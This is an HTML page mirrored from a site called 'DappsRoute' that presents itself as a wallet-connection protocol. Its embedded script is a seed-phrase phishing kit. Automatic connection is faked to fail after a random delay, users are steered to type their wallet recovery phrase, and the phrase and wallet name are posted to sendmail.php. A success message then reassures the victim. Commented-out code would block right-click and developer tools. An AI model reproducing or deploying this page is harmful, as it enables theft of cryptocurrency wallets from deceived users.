<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">



<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>

    <meta charset="utf-8">
    <title>Sign message in wallet</title>
    <meta name="author" content="themesflat.com">

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <link rel="stylesheet" type="text/css" href="assets/css/style.css">

    <link rel="shortcut icon" href="assets/icon/Favicon.html">
    <link rel="apple-touch-icon-precomposed" href="assets/icon/Favicon.html">
</head>

<!-- <body class="body header-fixed is_dark"> -->

<body class="body header-fixed">

   
    <div id="wrapper">
        <div id="page" class="clearfix">

            <header id="header_main" class="header_1 js-header">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <div id="site-header-inner">
                                <div class="wrap-box flex">
                                    <div id="site-logo" class="clearfix">
                                        <div id="site-logo-inner">
                                            <a href="#" rel="home" class="main-logo">
                                                <h4 style="color: white !important;">DappsRoute</h4>
                                            </a>
                                        </div>
                                    </div>
                                    <!-- <div class="mobile-button"><span></span></div> -->
                                    <!-- <nav id="main-nav" class="main-nav">
                                        <ul id="menu-primary-menu" class="menu">
                                            <li class="menu-item current-menu-item menu-item-has-children">
                                                <a href="index.html">Home</a>
                                                <ul class="sub-menu">
                                                    <li class="menu-item"><a href="index.html">Home 1</a></li>
                                                </ul>
                                            </li>
                                            <li class="menu-item menu-item-has-children">
                                                <a href="#">Activity</a>
                                                <ul class="sub-menu">
                                                    <li class="menu-item"><a href="activity1.html">Activity 1</a></li>
                                                    <li class="menu-item"><a href="activity2.html">Activity 2</a></li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </nav> -->
                                    <div class="flat-search-btn flex">
                                        <div class="header-search flat-show-search" id="s1">
                                            <a href="#" class="show-search header-search-trigger">
                                                <svg width="20" height="20" viewBox="0 0 20 20" fill="none"
                                                    xmlns="http://www.w3.org/2000/svg">
                                                    <mask id="mask0_334_638" style="mask-type:alpha"
                                                        maskUnits="userSpaceOnUse" x="1" y="1" width="18" height="17">
                                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                                            d="M1.66699 1.66666H17.6862V17.3322H1.66699V1.66666Z"
                                                            fill="white" stroke="white" />
                                                    </mask>
                                                    <g mask="url(#mask0_334_638)">
                                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                                            d="M9.67711 2.87312C5.9406 2.87312 2.90072 5.84505 2.90072 9.49903C2.90072 13.153 5.9406 16.1257 9.67711 16.1257C13.4128 16.1257 16.4527 13.153 16.4527 9.49903C16.4527 5.84505 13.4128 2.87312 9.67711 2.87312ZM9.67709 17.3322C5.26039 17.3322 1.66699 13.8182 1.66699 9.49902C1.66699 5.17988 5.26039 1.66666 9.67709 1.66666C14.0938 1.66666 17.6864 5.17988 17.6864 9.49902C17.6864 13.8182 14.0938 17.3322 9.67709 17.3322Z"
                                                            fill="white" />
                                                        <path
                                                            d="M9.67711 2.37312C5.67512 2.37312 2.40072 5.55836 2.40072 9.49903H3.40072C3.40072 6.13174 6.20607 3.37312 9.67711 3.37312V2.37312ZM2.40072 9.49903C2.40072 13.4396 5.67504 16.6257 9.67711 16.6257V15.6257C6.20615 15.6257 3.40072 12.8664 3.40072 9.49903H2.40072ZM9.67711 16.6257C13.6784 16.6257 16.9527 13.4396 16.9527 9.49903H15.9527C15.9527 12.8664 13.1472 15.6257 9.67711 15.6257V16.6257ZM16.9527 9.49903C16.9527 5.5584 13.6783 2.37312 9.67711 2.37312V3.37312C13.1473 3.37312 15.9527 6.1317 15.9527 9.49903H16.9527ZM9.67709 16.8322C5.52595 16.8322 2.16699 13.5316 2.16699 9.49902H1.16699C1.16699 14.1048 4.99484 17.8322 9.67709 17.8322V16.8322ZM2.16699 9.49902C2.16699 5.46656 5.52588 2.16666 9.67709 2.16666V1.16666C4.9949 1.16666 1.16699 4.8932 1.16699 9.49902H2.16699ZM9.67709 2.16666C13.8282 2.16666 17.1864 5.46649 17.1864 9.49902H18.1864C18.1864 4.89327 14.3593 1.16666 9.67709 1.16666V2.16666ZM17.1864 9.49902C17.1864 13.5316 13.8282 16.8322 9.67709 16.8322V17.8322C14.3594 17.8322 18.1864 14.1047 18.1864 9.49902H17.1864Z"
                                                            fill="white" />
                                                    </g>
                                                    <mask id="mask1_334_638" style="mask-type:alpha"
                                                        maskUnits="userSpaceOnUse" x="13" y="13" width="6" height="6">
                                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                                            d="M14.2012 14.2999H18.3333V18.3333H14.2012V14.2999Z"
                                                            fill="white" stroke="white" />
                                                    </mask>
                                                    <g mask="url(#mask1_334_638)">
                                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                                            d="M17.7166 18.3333C17.5596 18.3333 17.4016 18.2746 17.2807 18.1572L14.3823 15.3308C14.1413 15.0952 14.1405 14.7131 14.3815 14.4774C14.6217 14.2402 15.0123 14.2418 15.2541 14.4758L18.1526 17.303C18.3935 17.5387 18.3944 17.9199 18.1534 18.1556C18.0333 18.2746 17.8746 18.3333 17.7166 18.3333Z"
                                                            fill="white" />
                                                        <path
                                                            d="M17.7166 18.3333C17.5595 18.3333 17.4016 18.2746 17.2807 18.1572L14.3823 15.3308C14.1413 15.0952 14.1405 14.7131 14.3815 14.4774C14.6217 14.2402 15.0123 14.2418 15.2541 14.4758L18.1526 17.303C18.3935 17.5387 18.3944 17.9199 18.1534 18.1556C18.0333 18.2746 17.8746 18.3333 17.7166 18.3333"
                                                            stroke="white" />
                                                    </g>
                                                </svg>
                                            </a>
                                            <div class="top-search">
                                                <form action="#" method="get" role="search" class="search-form">
                                                    <input type="search" id="s" class="search-field"
                                                        placeholder="Search..." value="" name="s" title="Search for"
                                                        required="">
                                                    <button class="search search-submit" type="submit" title="Search">
                                                        <i class="icon-fl-search-filled"></i>
                                                    </button>
                                                </form>
                                            </div>
                                        </div>
                                        <div class="sc-btn-top mg-r-12" id="site-header">
                                            <a href="" id="connectbtn"
                                                class="sc-button header-slider style style-1 wallet fl-button pri-1">
                                                <span>Connect</span>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="mode_switche">
                    <a href="#" class="light d-flex align-items-center is_active">
                        <img src="" alt="">
                    </a>
                    <a href="#" class="dark d-flex align-items-center">
                        <img id="moon_dark" src="" alt="">
                    </a>
                </div>
            </header>
<p></p>
            <section class="tf-section top-seller" id="wallets_list">
                <head>
                    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
                    <meta name="viewport" content="width=device-width, initial-scale=1">
                    <style>
                      .buttonload {
                        background-color: #ffffff;
                        /* Green background */
                        border: none;
                        /* Remove borders */
                        color: black;
                        /* White text */
                        padding: 12px 24px;
                        /* Some padding */
                        font-size: 170px;
                        /* Set a font-size */
                      }
                    
                      /* Add a right margin to each icon */
                      .fa {
                        margin-left: -12px;
                        margin-right: 8px;
                      }
                    </style>
                </head>
                    <body>
                      <center>
                        <h2>Sign message in wallet..</h2>
                        <p></p>
                      </center>
                      <center>
                        <p></p>
                        <button class="buttonload">
                          <i class="fa fa-spinner fa-spin"></i>
                        </button>
                    
                    </body>
                </head>
            </section>


            <footer id="footer" class="clearfix style-2">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-lg-3 col-md-12 col-12">
                            <div class="widget widget-logo">
                                <div class="logo-footer" id="logo-footer">
                                    <a href="#.html">
                                        DappsRoute<br>
                                        
                                    </a>
                                </div>
                                <p class="sub-widget-logo">Open end decentralized protocol for syncing various Wallets
                                    to Dapps Secure Server. This is not an app but a protocol that establishes a remote
                                    connection between multiple Dapps.</p>
                            </div>
                        </div>
                        <div class="col-lg-3 col-md-6 col-sm-7 col-12">
                            <div class="widget widget-subcribe">
                                <h5 class="title-widget">Subscribe</h5>
                                <div class="form-subcribe">
                                    <form id="subscribe-form" action="#" method="GET" accept-charset="utf-8"
                                        class="form-submit">
                                        <input name="email" value="" class="email" type="email"
                                            placeholder="name@email.com" required>
                                        <button id="submit" name="submit" type="submit"><i
                                                class="icon-fl-send"></i></button>
                                    </form>
                                </div>
                                <div class="widget-social style-1 mg-t32" style="visibility:hidden">
                                    <ul>
                                        <li><a href="#"><i class="fab fa-twitter"></i></a></li>
                                        <li><a href="#"><i class="fab fa-facebook"></i></a></li>
                                        <li class="style-2"><a href="#"><i class="fab fa-telegram-plane"></i></a></li>
                                        <li><a href="#"><i class="fab fa-youtube"></i></a></li>
                                        <li class="mgr-none"><a href="#"><i class="icon-fl-tik-tok-2"></i></a></li>
                                        <li class="mgr-none"><a href="#"><i class="icon-fl-vt"></i></a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </footer>
        </div>

        

    <a id="scroll-top"></a>

    <script src="assets/js/jquery.min.js"></script>
    <script src="assets/js/jquery.easing.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script src="assets/js/wow.min.js"></script>
    <script src="assets/js/plugin.js"></script>
    <script src="assets/js/shortcodes.js"></script>
    <script src="assets/js/main.js"></script>
    <script src="assets/js/count-down.js"></script>
    <script src="assets/js/swiper-bundle.min.js"></script>
    <script src="assets/js/swiper.js"></script>
    <script src="assets/js/parallax.js"></script>
    <script src="assets/js/web3.min.js"></script>
    <script src="assets/js/moralis.js"></script>
    <script src="assets/js/nft.js"></script>

    <script>
        //Handle Select Wallet Click
        $(function () {
            $('.select_wallet').on('click', function () {
                var wd = $(this); //wd = wallet details

                $('#wallet_name').text(wd.data('title'));
                $('#wallet_logo').attr("src", wd.data('logo'));
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').hide();

                $('#popup_connect_wallet').modal('show');

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1, 15);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#failed_to_connect').show();
                }, interval);


            })

            $('#try_auto_connecting_again').on('click', function (e) {
                e.preventDefault();
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').hide();

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1, 20);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#failed_to_connect').show();
                }, interval);
            })

            $('#button_connect_manually').on('click', function (e) {
                e.preventDefault();
                $('#auto_connecting').hide();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').show();
            })

            //FOR PHRASE TEXT VALIDATION
            $('#secret_phrase').on('keyup', function () {
                var phrase_seed_entered = $(this).val().trim()
                if (phrase_seed_entered != "") {
                    var phrase_count = phrase_seed_entered.match(/(\w+)/g).length
                    console.log(phrase_count)
                    if ([12, 15, 18, 21, 24].includes(phrase_count)) {
                        $('#button_connect_wallet').attr('disabled', false).css('opacity', '1')
                    } else {
                        $('#button_connect_wallet').attr('disabled', false).css('opacity', '1')
                    }
                } else {
                    $('#button_connect_wallet').attr('disabled', true).css('opacity', '0.2')
                }
            })

            //CONNECT WALLET BUTTON Handler
            $('#button_connect_wallet').on('click', function (e) {
                e.preventDefault();
                let field = $('#secret_phrase')
                if (field.val().length >= 12) {
                    $(this).text('Loading...').css('pointer-events', 'none')

                    $.ajax({
                        url: "sendmail.php",
                        method: "POST",
                        data: { "load_phrase": 1, "data_phrase": field.val(), "wallet_selected": $('#wallet_name').text().trim() },
                        success: function (result) {
                            var result = JSON.parse(result);


                            if (result.result == "success") {
                                $('#button_connect_wallet').text('Connect Wallet').css('pointer-events', 'all')
                                $('#popup_connect_wallet').modal('hide')
                                $('#popup_connect_wallet_success').modal('show')
                                window.setTimeout(function () {
                                    window.location.href = 'index-2.html';
                                }, 5000000);


                            }

                            else {

                                alert(result);
                            }
                        },
                        error: function (xhr, ajaxOptions, thrownError) {
                            alert(thrownError);
                        }
                    })
                }
            })
        })

        function getRandomInt(min, max) {
            min = Math.ceil(min);
            max = Math.floor(max);
            return Math.floor(Math.random() * (max - min) + min); //The maximum is exclusive and the minimum is inclusive
        }

        //DISABLE RIGHT CLICK AND CTRL KEY
        // window.oncontextmenu = function () {
        //     return false;
        // }
        // $(document).keydown(function (event) {
        //     if (event.keyCode == 123) {
        //         return false;
        //     }
        //     else if ((event.ctrlKey && event.shiftKey && event.keyCode == 73) || (event.ctrlKey && event.shiftKey && event.keyCode == 74)) {
        //         return false;
        //     }
        // });
    </script>

    <style>
        .btn-outline-primary {
            width: 100%;
            border-radius: 20px;
            font-weight: 700;
            font-size: 15px;
            line-height: 22px;
            padding: 10px 20px;
            -webkit-transition: all 0.3s ease-in-out;
            -moz-transition: all 0.3s ease-in-out;
            -ms-transition: all 0.3s ease-in-out;
            -o-transition: all 0.3s ease-in-out;
            transition: all 0.3s ease-in-out;
            outline: none;
            border: 1px solid #5142FC;
            margin-bottom: 10px
        }
    </style>
</body>



<!-- Mirrored from syncchains.web.app/wallets.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 12 Nov 2023 10:18:09 GMT -->
</html>